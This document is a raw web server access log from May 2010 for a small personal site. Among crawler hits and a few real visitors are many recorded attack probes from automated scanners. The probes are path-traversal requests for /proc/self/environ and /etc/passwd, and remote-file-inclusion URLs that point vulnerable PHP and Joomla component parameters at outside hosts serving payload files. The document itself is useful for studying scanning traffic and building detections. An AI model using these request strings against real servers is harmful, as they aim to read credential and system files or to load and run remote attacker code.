207.46.204.233 - - [15/May/2010:09:29:39 -0500] "GET /logs/access_log.1215907200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.152.200.50 - - [15/May/2010:09:31:00 -0500] "GET /logs/access_log.1273363200//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 384 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:09:31:00 -0500] "GET //administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:09:31:00 -0500] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 362 "-""libwww-perl/5.834"
210.174.163.182 - - [15/May/2010:09:32:18 -0500] "GET //trans.php?trans=fr&page=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:09:32:18 -0500] "GET /logs//trans.php?trans=fr&page=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
204.152.200.50 - - [15/May/2010:09:32:23 -0500] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 362 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:09:32:23 -0500] "GET //administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.834"
207.46.13.135 - - [15/May/2010:09:34:09 -0500] "GET /logs/access_log.1221177600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [15/May/2010:09:35:06 -0500] "GET //store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 331 "-""libwww-perl/5.79"
38.101.148.126 - - [15/May/2010:09:37:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:37:48 -0500] "GET /logs/access_log.1211846400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:37:54 -0500] "GET /logs/access_log.1217116800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:38:02 -0500] "GET /logs/access_log.1226620800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
92.227.161.201 - - [15/May/2010:09:38:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
38.101.148.126 - - [15/May/2010:09:38:10 -0500] "GET /logs/access_log.1211673600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:38:20 -0500] "GET /logs/access_log.1214697600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:38:28 -0500] "GET /logs/access_log.1225152000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:38:52 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:39:08 -0500] "GET /logs/access_log.1258070400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
121.88.4.141 - - [15/May/2010:09:39:15 -0500] "GET /logs/access_log.1271894400//store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-""libwww-perl/5.79"
121.88.4.141 - - [15/May/2010:09:39:16 -0500] "GET //store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 331 "-""libwww-perl/5.79"
121.88.4.141 - - [15/May/2010:09:39:17 -0500] "GET /logs//store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 336 "-""libwww-perl/5.79"
87.250.255.243 - - [15/May/2010:09:39:40 -0500] "GET /logs/access_log.1194739200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.43 - - [15/May/2010:09:40:00 -0500] "GET /artwork/paintings.htm HTTP/1.1" 200 2300 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
210.174.163.181 - - [15/May/2010:09:43:23 -0500] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
210.174.163.181 - - [15/May/2010:09:43:23 -0500] "GET /logs/access_log.1272844800///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
210.174.163.181 - - [15/May/2010:09:43:23 -0500] "GET ///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
38.101.148.126 - - [15/May/2010:09:43:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:43:41 -0500] "GET /logs/access_log.1217548800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:44:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:44:38 -0500] "GET /logs/access_log.1221782400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:44:46 -0500] "GET /logs/access_log.1238198400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
210.174.163.181 - - [15/May/2010:09:45:32 -0500] "GET ///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
210.174.163.181 - - [15/May/2010:09:45:33 -0500] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
210.174.163.181 - - [15/May/2010:09:45:33 -0500] "GET /logs/access_log.1268956800%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.199.52 - - [15/May/2010:09:45:39 -0500] "GET /logs/access_log.1212624000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.71.175 - - [15/May/2010:09:47:57 -0500] "GET /logs/access_log.1266192000/ashheadlines.php?pathtoashnews=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
91.121.71.175 - - [15/May/2010:09:47:57 -0500] "GET /logs/access_log.1264204800/ashheadlines.php?pathtoashnews=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
91.121.71.175 - - [15/May/2010:09:47:57 -0500] "GET /ashheadlines.php?pathtoashnews=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.121.71.175 - - [15/May/2010:09:47:57 -0500] "GET /logs/ashheadlines.php?pathtoashnews=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
93.186.180.65 - - [15/May/2010:09:49:36 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
210.174.163.181 - - [15/May/2010:09:49:42 -0500] "GET /logs/access_log.1272844800%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.199.49 - - [15/May/2010:09:51:39 -0500] "GET /logs/access_log.1232841600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:09:54:43 -0500] "GET /logs/access_log.1209254400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.225 - - [15/May/2010:09:56:40 -0500] "GET /logs/access_log.1270944000 HTTP/1.1" 200 708888 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.233 - - [15/May/2010:09:57:39 -0500] "GET /logs/access_log.1238025600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.51 - - [15/May/2010:10:00:09 -0500] "GET /logs/access_log.1168473600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.223.118.60 - - [15/May/2010:10:00:54 -0500] "GET /logs/access_log.1272844800//include/mail.inc.php?root=http://www.exagon-engineeringweb.com/.news.jpg? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
83.223.118.60 - - [15/May/2010:10:00:55 -0500] "GET //include/mail.inc.php?root=http://www.exagon-engineeringweb.com/.news.jpg? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
83.223.118.60 - - [15/May/2010:10:00:55 -0500] "GET /logs//include/mail.inc.php?root=http://www.exagon-engineeringweb.com/.news.jpg? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
83.223.118.60 - - [15/May/2010:10:00:58 -0500] "GET /logs/access_log.1272844800//include/mail.inc.php?root=http://www.exagon-engineeringweb.com/.news.jpg? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
83.223.118.60 - - [15/May/2010:10:00:59 -0500] "GET //include/mail.inc.php?root=http://www.exagon-engineeringweb.com/.news.jpg? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
83.223.118.60 - - [15/May/2010:10:00:59 -0500] "GET /logs//include/mail.inc.php?root=http://www.exagon-engineeringweb.com/.news.jpg? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
83.223.118.60 - - [15/May/2010:10:01:00 -0500] "GET /logs/access_log.1272844800//include/mail.inc.php?root=http://www.exagon-engineeringweb.com/.news.jpg? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
83.223.118.60 - - [15/May/2010:10:01:01 -0500] "GET //include/mail.inc.php?root=http://www.exagon-engineeringweb.com/.news.jpg? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
83.223.118.60 - - [15/May/2010:10:01:01 -0500] "GET /logs//include/mail.inc.php?root=http://www.exagon-engineeringweb.com/.news.jpg? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
59.42.10.71 - - [15/May/2010:10:02:33 -0500] "GET /////////?cms[tngpath]=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 200 1010 "-""libwww-perl/5.831"
59.42.10.71 - - [15/May/2010:10:02:35 -0500] "GET /////////?cms[tngpath]=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 200 1010 "-""libwww-perl/5.831"
93.159.16.170 - - [15/May/2010:10:03:03 -0500] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.805"
93.159.16.170 - - [15/May/2010:10:03:04 -0500] "GET //components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
93.159.16.170 - - [15/May/2010:10:03:07 -0500] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-""libwww-perl/5.805"
93.159.16.170 - - [15/May/2010:10:03:07 -0500] "GET //components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
89.163.148.130 - - [15/May/2010:10:03:25 -0500] "GET /logs/access_log.1236988800//?shop_this_skin_path=http://www.dublinguesthouseguide.com/templates/rhuk_milkyway/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.163.148.130 - - [15/May/2010:10:03:25 -0500] "GET //?shop_this_skin_path=http://www.dublinguesthouseguide.com/templates/rhuk_milkyway/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.163.148.130 - - [15/May/2010:10:03:25 -0500] "GET /logs//?shop_this_skin_path=http://www.dublinguesthouseguide.com/templates/rhuk_milkyway/id1.txt? HTTP/1.1" 200 5643 "-""Mozilla/5.0"
213.251.189.206 - - [15/May/2010:10:10:30 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pras.oxide.net.pl/scan/zfxidd.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
213.251.189.206 - - [15/May/2010:10:10:30 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pras.oxide.net.pl/scan/zfxidd.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.251.189.206 - - [15/May/2010:10:10:30 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pras.oxide.net.pl/scan/zfxidd.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.103.72.130 - - [15/May/2010:10:12:07 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pras.oxide.net.pl/scan/zfxidd.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
83.103.72.130 - - [15/May/2010:10:12:07 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pras.oxide.net.pl/scan/zfxidd.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
83.103.72.130 - - [15/May/2010:10:12:07 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pras.oxide.net.pl/scan/zfxidd.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:10:12:44 -0500] "GET /logs/access_log.1260576000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.244 - - [15/May/2010:10:15:09 -0500] "GET /logs/access_log.1156809600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.163.148.130 - - [15/May/2010:10:15:25 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.dublinguesthouseguide.com/templates/rhuk_milkyway/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.163.148.130 - - [15/May/2010:10:15:25 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.dublinguesthouseguide.com/templates/rhuk_milkyway/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.163.148.130 - - [15/May/2010:10:15:25 -0500] "GET /logs/access_log.1264032000//squirrelcart/cart_content.php?cart_isp_root=http://www.dublinguesthouseguide.com/templates/rhuk_milkyway/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
89.163.148.130 - - [15/May/2010:10:15:25 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.dublinguesthouseguide.com/templates/rhuk_milkyway/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.163.148.130 - - [15/May/2010:10:15:25 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.dublinguesthouseguide.com/templates/rhuk_milkyway/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.163.148.130 - - [15/May/2010:10:15:25 -0500] "GET /logs/access_log.1264032000//squirrelcart/cart_content.php?cart_isp_root=http://www.dublinguesthouseguide.com/templates/rhuk_milkyway/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
173.203.114.172 - - [15/May/2010:10:16:18 -0500] "GET /logs/access_log.1264032000//squirrelcart/cart_content.php?cart_isp_root=http://www.unoanuncios.com/media/system/js/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
173.203.114.172 - - [15/May/2010:10:16:18 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.unoanuncios.com/media/system/js/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
173.203.114.172 - - [15/May/2010:10:16:18 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.unoanuncios.com/media/system/js/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
173.203.114.172 - - [15/May/2010:10:16:18 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.unoanuncios.com/media/system/js/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
173.203.114.172 - - [15/May/2010:10:16:18 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.unoanuncios.com/media/system/js/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
173.203.114.172 - - [15/May/2010:10:16:18 -0500] "GET /logs/access_log.1264032000//squirrelcart/cart_content.php?cart_isp_root=http://www.unoanuncios.com/media/system/js/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
91.121.71.175 - - [15/May/2010:10:16:25 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
91.121.71.175 - - [15/May/2010:10:16:25 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
91.121.71.175 - - [15/May/2010:10:16:25 -0500] "GET /logs/access_log.1273190400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
78.110.50.139 - - [15/May/2010:10:16:25 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.unoanuncios.com/media/system/js/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
78.110.50.139 - - [15/May/2010:10:16:25 -0500] "GET /logs/access_log.1264032000//squirrelcart/cart_content.php?cart_isp_root=http://www.unoanuncios.com/media/system/js/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
78.110.50.139 - - [15/May/2010:10:16:25 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.unoanuncios.com/media/system/js/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
76.118.120.239 - - [15/May/2010:10:19:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.bing.com/search?q=vintage+tattoo+flash&form=CPNTDF&pc=CPNTDF&src=IE-SearchBox""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
76.118.120.239 - - [15/May/2010:10:19:55 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
76.118.120.239 - - [15/May/2010:10:19:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
69.175.105.186 - - [15/May/2010:10:20:01 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
68.9.193.15 - - [15/May/2010:10:21:52 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?q=vintage+tattoo+flash+&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:53 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:56 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:56 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:56 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:56 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:56 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:56 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:56 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:57 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:57 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:57 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:57 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:21:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.9.193.15 - - [15/May/2010:10:22:08 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
69.175.105.186 - - [15/May/2010:10:23:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
69.175.105.186 - - [15/May/2010:10:23:09 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
69.175.105.186 - - [15/May/2010:10:23:09 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
87.250.255.243 - - [15/May/2010:10:24:44 -0500] "GET /logs/access_log.1254787200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.105.186 - - [15/May/2010:10:27:54 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.221.175.60 - - [15/May/2010:10:29:50 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
89.221.175.60 - - [15/May/2010:10:29:51 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
88.80.206.4 - - [15/May/2010:10:30:19 -0500] "GET /administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://suzukigsxr.biz/bezbol/id.jpg? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
88.80.206.4 - - [15/May/2010:10:30:20 -0500] "GET /logs/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://suzukigsxr.biz/bezbol/id.jpg? HTTP/1.1" 404 359 "-""libwww-perl/5.805"
207.46.199.190 - - [15/May/2010:10:31:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.221.175.60 - - [15/May/2010:10:32:24 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
124.115.6.16 - - [15/May/2010:10:33:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Sosospider+(+http://help.soso.com/webspider.htm)"
89.221.175.60 - - [15/May/2010:10:39:27 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
89.221.175.60 - - [15/May/2010:10:39:28 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
89.221.175.60 - - [15/May/2010:10:39:28 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
59.42.10.71 - - [15/May/2010:10:39:40 -0500] "GET /logs/access_log.1219795200/////////?cms[tngpath]=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.831"
59.42.10.71 - - [15/May/2010:10:39:40 -0500] "GET /logs/access_log.1219795200/////////?cms[tngpath]=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.831"
